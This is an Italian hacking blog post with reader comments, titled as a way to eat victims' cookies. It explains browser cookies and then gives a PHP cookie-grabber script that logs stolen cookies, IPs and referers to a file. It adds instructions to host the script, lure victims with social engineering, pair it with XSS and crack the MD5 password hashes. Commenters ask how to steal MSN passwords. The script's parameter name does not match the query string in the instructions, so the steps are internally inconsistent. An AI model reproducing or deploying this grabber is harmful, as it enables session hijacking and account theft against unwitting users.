Cookie Grabber, pappatevi i gustosi “biscotti” delle vostre vittime!

Cosa è un Cookie?

Un cookie è un file di testo contenente dei parametri, che viene inviato dal server web in contemporanea alla pagina, e successivamente viene stoccato in una cartella del vostro browser.

I cookie racchiudono una serie di “caratteristiche” che permettono al browser di identificarli e di associarli al server web che li ha prodotti.

L’intenzione di chi ci invia un cookie è quella di aiutarci a navigare sul suo sito, memorizzare l’identità e le nostre preferenze, così da offrirci qualcosa di più indicato ai nostri gusti.

Un’altra funzione importantissima dei cookie è quella di consentirci di accedere ad aree riservate di un sito web.

Dopo aver inserito in un form, username e password, il server ci invia un cookie che ci da i permessi ad accedere alle pagine riservate, quindi se proviamo a settare il nostro browser in modo tale da rifiutare i cookie, non potremo autenticarci su nessun sito.

Adesso veniamo al lato negativo dei cookie, uno è quello dello spam, navigando nel web molte aziende piazzano i loro banner, quando il browser si collega al loro server web per downloadare il banner, le aziende possono inviarci un cookie e raccogliere dati su di noi, per inviarci pubblicità indesiderata.

 

I cookie rimangono sull’hard disk per molto tempo, un soggetto che abbia accesso al nostro Pc o venga in possesso dei nostri cookie con un cookie grabber, oltre a scoprire i nostri gusti e altre informazioni personali, può utilizzarli per loggarsi su certi siti rubandoci la nostra identità.

Con poche righe di codice scritte in php, avrete un fantastico cookie grabber da utilizzare con una XSS.

Vi basta copiare il codice in un qualsiasi editor di testo e salvare con estensione .php, dopo ciò uppatelo sul vostro spazio web, con un po di social engineering indirizzate la vittima al link della pagina con in più questa stringa ?data=doocument.cookie.

Se utilizzato con una XSS, nei cookie troverete le password dei siti criptate in hash md5, dopo di che non vi resta che darle in pasto al tool.

Buon divertimento!

 

Codice del cookie grabber:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>


22 Responses to “Cookie Grabber, pappatevi i gustosi “biscotti” delle vostre vittime!”


  1. 1 Alexander555 27, luglio, 2007 alle 8:50 am

    Salve.. vorrei sapere se il codice è giusto, perchè su un altro sito ho trovato questo: $data = $_GET[’data’];
    al posto di quello vostro: $_GET[’data’] = $data

    Inoltre, cos’è una XSS??? Come la creo??

    e come risalgo a user e password tramite i miei cookie?

  2. 2 underground0 27, luglio, 2007 alle 5:48 pm

    L’attacco XSS appartiene alla tipologia injection, quindi si tratta di immissione di codice arbitrario in input alle pagine web.
    L’attacco può essere portato a compimento su qualsiasi sito che presenti l’utilizzo di tecnologie come JavaScript, VBScript, ActiveX, HTML e Flash.

  3. 3 karlo 31, luglio, 2007 alle 3:07 pm

    quello giusto è questo:
    $data = $_GET[’data’];

  4. 4 r080cy90r 16, agosto, 2007 alle 5:13 am

    $data = $_GET[’data’];

    $_GET[’data’] = $data

    Scusami karlo ma secondo il tuo pnto di vista penso di grande programmatore PHP per asserire una frase come quella che hai detto..quale sarebbe la differenza tra le due dichiarazioni di variabili??(sempre se tu sappia di cosa intendo con dichiarazione di variabili…)sai quale è la risposta nessuna..sono esattamente la stessa cosa…madonna che gente..e il bello è che lo dice come un megaconsiglio STUDIA VA CHE é MEGLIO…scusa underground0 ma io ste cose proprip nn le sopporto..scusa il flame!

  5. 5 susanna 6, settembre, 2007 alle 10:44 pm

    io dovrei rubare una password di msn tramite i cookie.. come faccio? GRAZIE CIAO A TUTTI

  6. 6 DevastaPalle 3, novembre, 2007 alle 10:53 pm

    Scusate, ma come sarebbe “sono la stessa cosa” ? Oo?
    nel lvalue viene copiato il valore del rvalue, quindi l’ordine e’ importante. Oo.

  7. 7 wii 12, novembre, 2007 alle 12:28 am

    scusae ma non ho capito lo stesso come trovare o fare na xss c’è una guida?

  8. 8 Napster 20, dicembre, 2007 alle 1:45 pm

    Bello!😉 ma è possibile che in tutti i post che ci sono msn è sempre in causa?! MHA… che gente😉

  9. 9 Napster 20, dicembre, 2007 alle 2:00 pm

    Non funzia Parse error: syntax error, unexpected T_STRING in /membri/session/altro/cookie_grabber_prova.php on line 2

  10. 10 Ricky92 27, gennaio, 2008 alle 3:21 pm

    r080cy90r, scusa ma hai torto. karlo ha perfettamente ragione, il codice giusto è:
    $data = $_GET[‘data’];
    Non è assolutamente possibile copiare il valore di una variabile mettendo la variabile ‘destinataria’ al secondo posto, poichè essendo vuota assegnerebbe alla variabile $_GET[‘data’] un valore nullo. In poche parole ti ritroveresti con due variabili vuote. Un po’ inutile, eh?

  11. 11 DevilKnight 1, febbraio, 2008 alle 11:44 am

    Salve,
    per caso ho letto questa discussione e vorrei capire alcuni punti,
    allora dopo aver creato il cookie grabber e averlo pubblicato sul mio spazio, invio il link alla vittima che da come ho capito dovrebbe contenere http://sitomio.altervista.org/cookiegrabber.php?data=doocument.cookie, usando XSS dovrei inserire il link del cookie nella pagina da inviare alla vittima?non ho ben capito
    se potreste rispondermi all’indirizzo email oppur qui. tnx
    devil

  12. 12 r080cy90r 13, febbraio, 2008 alle 12:08 am

    Minkia sapete che mi ero completamente dimenticato di questo post?? me loha fatto notare un ragazzo oggi via msn… eh si rega ho detto una cazzata cosmica e mi scuso con karlo…minkia aveva pienamente ragione…ma all’epoca ero un emerito cazzone..perdonate questa tremenda gaffe..ammetto le mie colpe e mi cospargo il capo di cenere..all’epoca la programmazione non era proprio il mio pane quotidiano..!

  13. 13 underground0 15, febbraio, 2008 alle 2:02 pm

    Mi scuso anche io, ho pubblicato un errore, pardon è un post d’inizio!😀 E di php non è che me ne intedevo tanto! Se non commentavate non mi sarei accorto e non avrei mai corretto!😉 Thank’s

  14. 14 Anonimo 22, febbraio, 2008 alle 1:18 pm

    ma serve per forza una xss per prendere i cookie? non basta far andare una personasulla pagina dove si trova il codice?

  15. 15 Alexander555 21, marzo, 2008 alle 3:14 pm

    Se non ho capito male devo inserire quel codice nel HTML di una pagina del mio sito web; una volta che la vittima è entrata cosa devo fare?
    e qual’è il tool di cui parli??

  16. 16 city125 30, agosto, 2008 alle 10:46 pm

    ciao raga come posso arrivare a trovare nome e cognome della persona che mi ha mandato un email?praticamente mi è arrivato un messaggio postale da qst indirizzo email infamandomi ma voglio arrivare alla persona come posso?aiutatemi pleaseeeeeee

  17. 17 underground0 31, agosto, 2008 alle 12:53 pm

    @city125: prova a cercale l’email su google, magari qualcosa salta fuori😉

  18. 18 Anonimo 12, dicembre, 2008 alle 12:52 pm

    siete tutti dei lamer.
    Uno posta una guida e subito tutti ‘come rubo le password di msn?’
    Vergognatevi

  19. 19 memedesimo 9, marzo, 2009 alle 4:51 pm

    “minkia aveva pienamente ragione…ma all’epoca ero un emerito cazzone..perdonate questa tremenda..”

    eri messo talmente male, che dubito che tu possa aver fatto grandi passi in soli 6 mesi 🙂

  20. 20 Nicola 1, maggio, 2009 alle 2:43 pm

    Non funzionerà mai, il xss manda alla pagina del grabber ma siccome il grabber prende i cookies della pagina da dove è venuto, prende i cookies dello script xss, ovvero nessuno.

  21. 21 christian 3, maggio, 2010 alle 1:45 pm

    io invece non sopporto la gente come te!!

    da programmatore php avrei risposto con educazione semplicemente questo:

    sono giusti entrambi perchè nel php l’assegnazione… eccetera eccetera! senza bisogno di alterarsi…
    visto? non mi sono incazzato, ti ho risposto educatamente! Ciao!


  1. 1 Vulerabilità: Cross Site Scripting, XSS « UnderGround0 World Trackback su 4, febbraio, 2008 alle 3:56 pm
Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

giugno: 2007
L M M G V S D
    Lug »
 123
45678910
11121314151617
18192021222324
252627282930